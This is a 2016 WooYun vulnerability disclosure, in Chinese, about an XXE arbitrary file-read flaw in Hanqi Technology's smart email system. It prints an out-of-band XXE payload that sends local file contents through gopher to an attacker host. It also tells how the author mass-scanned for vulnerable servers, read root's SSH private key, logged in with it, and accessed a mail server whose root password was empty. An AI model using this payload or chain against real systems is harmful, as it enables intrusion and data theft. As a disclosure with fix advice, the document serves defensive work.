当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0189058

漏洞标题:汉启科技智能邮件系统一个XXE文件读取引发的血案

相关厂商:深圳市汉启网络科技有限公司

漏洞作者: 刺刺

提交时间:2016-03-25 21:40

修复时间:2016-05-13 10:40

公开时间:2016-05-13 10:40

漏洞类型:应用配置错误

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心,深圳市汉启网络科技有限公司)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-25: 细节已通知厂商并且等待厂商处理中
2016-03-29: 厂商已经确认,细节仅向厂商公开
2016-04-08: 细节向核心白帽子及相关领域专家公开
2016-04-18: 细节向普通白帽子公开
2016-04-28: 细节向实习白帽子公开
2016-05-13: 细节向公众公开

简要描述:

RT

详细说明:

汉启科技的智能邮件群发(触发系统)存在Xfire任意文件读取的问题
陈老师的link:
http://**.**.**.**/bugs/wooyun-2010-0166751
列目录的list.xml

<!ENTITY % a SYSTEM "file:///">
<!ENTITY % b "<!ENTITY &#37; c SYSTEM 'gopher://remote_ip:port/?%a;'>">
%b;
%c;


读取文件的dtd

<!ENTITY % a SYSTEM "file:///">
<!ENTITY % b "<!ENTITY &#37; c SYSTEM 'gopher://remote_ip:port/?%a;'>">
%b;
%c;


使用AWVS来验证:

hanqinet.jpg


存在问题的URL有很多:
写了个脚本,将以上hosts的IP段全跑了一遍,结果如下:

mask 区域 
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
*******/se*****
1.://**.**.**/smartedm/services_
2.://**.**.**/smartedm/services_
3.://**.**.**/smartedm/services_
4.://**.**.**/smartedm/services_
5.://**.**.**/smartedm/services_
6.://**.**.**/smartedm/services_
7.://**.**.**/smartedm/services_
8.://**.**.**/smartedm/services_
9.://**.**.**/smartedm/services_
10.://**.**.**/smartedm/services_
11.://**.**.**/smartedm/services_
12.://**.**.**/smartedm/services_
13.://**.**.**/smartedm/services_
14.://**.**.**/smartedm/services_
15.://**.**.**/smartedm/services_
16.://**.**.**/smartedm/services_
17.://**.**.**/smartedm/services_
18.://**.**.**/smartedm/services_
19.://**.**.**/smartedm/services_
20.://**.**.**/smartedm/services_
21.://**.**.**/smartedm/services_
22.://**.**.**/smartedm/services_
23.://**.**.**/smartedm/services_
24.://**.**.**/smartedm/services_
25.://**.**.**/smartedm/services_
26.://**.**.**/smartedm/services_
27.://**.**.**/smartedm/services_
28.://**.**.**/smartedm/services_
29.://**.**.**/smartedm/services_
30.://**.**.**/smartedm/services_
31.://**.**.**/smartedm/services_
32.://**.**.**/smartedm/services_
33.://**.**.**/smartedm/services_
34.://**.**.**/smartedm/services_
35.://**.**.**/smartedm/services_
36.://**.**.**/smartedm/services_
37.://**.**.**/smartedm/services_
38.://**.**.**/smartedm/services_
39.://**.**.**/smartedm/services_
40.://**.**.**/smartedm/services_
41.://**.**.**/smartedm/services_
42.://**.**.**/smartedm/services_
43.://**.**.**/smartedm/services_
44.://**.**.**/smartedm/services_
45.://**.**.**/smartedm/services_
46.://**.**.**/smartedm/services_
47.://**.**.**/smartedm/services_
48.://**.**.**/smartedm/services_
49.://**.**.**/smartedm/services_
50.://**.**.**/smartedm/services_
51.://**.**.**/smartedm/services_
52.://**.**.**/smartedm/services_
53.://**.**.**/smartedm/services_
54.://**.**.**/smartedm/services_
55.://**.**.**/smartedm/services_
56.://**.**.**/smartedm/services_
57.://**.**.**/smartedm/services_
58.://**.**.**/smartedm/services_
59.://**.**.**/smartedm/services_
60.://**.**.**/smartedm/services_
61.://**.**.**/smartedm/services_
62.://**.**.**/smartedm/services_
63.://**.**.**/smartedm/services_
64.://**.**.**/smartedm/services_
65.://**.**.**/smartedm/services_
66.://**.**.**/smartedm/services_
67.://**.**.**/smartedm/services_
68.://**.**.**/smartedm/services_
69.://**.**.**/smartedm/services_
70.://**.**.**/smartedm/services_
71.://**.**.**/smartedm/services_
72.://**.**.**/smartedm/services_
73.://**.**.**/smartedm/services_
74.://**.**.**/smartedm/services_
75.://**.**.**/smartedm/services_
76.://**.**.**/smartedm/services_
77.://**.**.**/smartedm/services_
78.://**.**.**/smartedm/services_
79.://**.**.**/smartedm/services_
80.://**.**.**/smartedm/services_
81.://**.**.**/smartedm/services_
82.://**.**.**/smartedm/services_
83.://**.**.**/smartedm/services_
84.://**.**.**/smartedm/services_
85.://**.**.**/smartedm/services_
86.://**.**.**/smartedm/services_
87.://**.**.**/smartedm/services_
88.://**.**.**/smartedm/services_
89.://**.**.**/smartedm/services_
90.://**.**.**/smartedm/services_
91.://**.**.**/smartedm/services_
92.://**.**.**/smartedm/services_
93.://**.**.**/smartedm/services_
94.://**.**.**/smartedm/services_
95.://**.**.**/smartedm/services_
96.://**.**.**/smartedm/services_
97.://**.**.**/smartedm/services_
98.://**.**.**/smartedm/services_
99.://**.**.**/smartedm/services_
100.://**.**.**/smartedm/services_
101.://**.**.**/smartedm/services_
102.://**.**.**/smartedm/services_
103.://**.**.**/smartedm/services_
104.://**.**.**/smartedm/services_
105.://**.**.**/smartedm/services_
106.://**.**.**/smartedm/services_
107.://**.**.**/smartedm/services_
108.://**.**.**/smartedm/services_
109.://**.**.**/smartedm/services_
110.://**.**.**/smartedm/services_
111.://**.**.**/smartedm/services_
112.://**.**.**/smartedm/services_
113.://**.**.**/smartedm/services_
114.://**.**.**/smartedm/services_
115.://**.**.**/smartedm/services_
116.://**.**.**/smartedm/services_
117.://**.**.**/smartedm/services_
118.://**.**.**/smartedm/services_
119.://**.**.**/smartedm/services_
120.://**.**.**/smartedm/services_
121.://**.**.**/smartedm/services_
122.://**.**.**/smartedm/services_
123.://**.**.**/smartedm/services_
124.://**.**.**/smartedm/services_
125.://**.**.**/smartedm/services_
126.://**.**.**/smartedm/services_
127.://**.**.**/smartedm/services_
128.://**.**.**/smartedm/services_
129.://**.**.**/smartedm/services_
130.://**.**.**/smartedm/services_
131.://**.**.**/smartedm/services_
132.://**.**.**/smartedm/services_
133.://**.**.**/smartedm/services_
134.://**.**.**/smartredm/services_
135.://**.**.**/smartredm/services_
136.://**.**.**/smartredm/services_
137.://**.**.**/smartredm/services_
138.://**.**.**/smartredm/services_
139.://**.**.**/smartredm/services_
140.://**.**.**/smartredm/services_
141.://**.**.**/smartredm/services_
142.://**.**.**/smartredm/services_
143.://**.**.**/smartredm/services_
144.://**.**.**/smartredm/services_
145.://**.**.**/smartredm/services_
146.://**.**.**/smartredm/services_
147.://**.**.**/smartredm/services_
148.://**.**.**/smartredm/services_
149.://**.**.**/smartredm/services_
150.://**.**.**/smartredm/services_
151.://**.**.**/smartredm/services_
152.://**.**.**/smartredm/services_
153.://**.**.**/smartredm/services_
154.://**.**.**/smartredm/services_
155.://**.**.**/smartredm/services_
156.://**.**.**/smartredm/services_
157.://**.**.**/smartredm/services_
158.://**.**.**/smartredm/services_
159.://**.**.**/smartredm/services_
160.://**.**.**/smartredm/services_
161.://**.**.**/smartredm/services_
162.://**.**.**/smartredm/services_
163.://**.**.**/smartredm/services_
164.://**.**.**/smartredm/services_
165.://**.**.**/smartredm/services_
166.://**.**.**/smartredm/services_
167.://**.**.**/smartredm/services_
168.://**.**.**/smartredm/services_
169.://**.**.**/smartredm/services_
170.://**.**.**/smartredm/services_
171.://**.**.**/smartredm/services_
172.://**.**.**/smartredm/services_
173.://**.**.**/smartredm/services


至于其他的用户我就不列举了。
XXE读取文件的时候,发现/root/.ssh/目录居然有id_rsa文件;

ras3.jpg


内容可以读取(用户通知了你们XXE漏洞,但是没有告诉你们自己的问题吧)
读取回来的id_rsa内容被url编码了,这里本人比较菜
URL decode会将内容中的加号给修改成空格,验证几次都特么不对;
还有就是新建的id_rsa在windows环境上传到linux环境格式不对,折腾了好久
终于搞定了。

rsa.jpg

漏洞证明:

使用id_rsa登录主机:

rsa.jpg


其实都是一个主机多个网卡啊

mask 区域 
*****-a|grep '*****
*****t:**.**.**.** *****
*****st:**.**.**.*******
*****st:**.**.**.*******
*****st:**.**.**.*******
*****st:**.**.**.*******
*****st:**.**.**.*******
*****st:**.**.**.*******
*****st:**.**.**.*******
*****st:**.**.**.*******
*****st:**.**.**.*******
*****st:**.**.**.*******
*****st:**.**.**.*******
*****st:**.**.**.*******
*****st:**.**.**.*******
*****st:**.**.**.*******
*****st:**.**.**.*******
*****st:**.**.**.*******
*****st:**.**.**.*******
*****st:**.**.**.*******
*****^区,密^*****
******.**.*******
******.**.*******
******.**.*******
******.**.*******
******.**.*******


sh2.jpg


这么的服务器,都不知道如何群发了……
其中**.**.**.**居然和**.**.**.**邮箱在同一个服务器上
邮箱是Exmail root密码为空

mm.jpg


登录邮箱:

mail2.jpg


邮箱的内容就不多演示了,看你们的客户多好啊。

wm.jpg

修复方案:

1.可根据陈老师的建议修复xfire,或建议用户在防火墙上功能限制80 8080 8081端口的访问;
2. id_rsa记得百度一下,这个不需要放到目标服务器的.ssh目录的;
3. 如果对我本人不放心的话,记得修改全公司用户的邮箱密码。
4. 多看乌云,产品少漏洞!

版权声明:转载请注明来源 刺刺@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-03-29 10:38

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无